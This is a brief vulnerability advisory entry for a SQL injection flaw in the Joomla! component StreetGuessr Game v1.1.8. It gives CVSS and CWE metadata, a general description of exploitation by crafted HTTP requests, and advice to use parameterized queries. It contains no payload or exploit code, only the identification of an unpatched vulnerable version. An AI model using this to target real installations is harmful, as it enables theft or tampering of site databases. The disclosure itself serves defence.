Vendor: StreetGuessr Game
By: Ihsan Sencan
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: StreetGuessr Game
Affected Version From: 1.1.8
Affected Version To: 1.1.8
Patch Exists: NO
Related CWE: N/A
CPE: a:nordmograph:streetguessr_game:1.1.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017
Joomla! Component StreetGuessr Game v1.1.8 – SQL Injection
An attacker can exploit a SQL injection vulnerability in Joomla! Component StreetGuessr Game v1.1.8 by sending a specially crafted HTTP request containing a malicious SQL query to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, modify or delete data, execute system-level commands, and even gain access to the underlying server.
Mitigation:
Developers should always use parameterized queries, also known as prepared statements, when interacting with the database. This ensures that user-supplied input is bound as a data value and is never interpreted as part of the SQL query itself.